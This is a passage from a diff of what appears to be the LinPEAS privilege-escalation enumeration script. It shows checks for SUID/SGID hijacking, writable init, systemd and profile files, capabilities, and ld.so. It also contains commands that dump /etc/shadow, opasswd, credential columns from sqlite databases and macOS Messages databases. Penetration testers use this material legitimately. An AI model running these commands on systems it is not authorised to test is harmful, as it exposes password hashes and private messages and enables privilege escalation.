columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi fi done - echo "" + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi fi fi + fi + fi +done; +echo "" + + +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" done fi - echo "" +done +echo "" - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," fi - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" +##-- IF) Users with capabilities +print_2title "Users with capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else echo_not_found "/etc/security/capability.conf" +fi +echo "" - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + +print_2title "Broken links in path" +echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; +done +echo "" + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. " +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. " +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" +lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 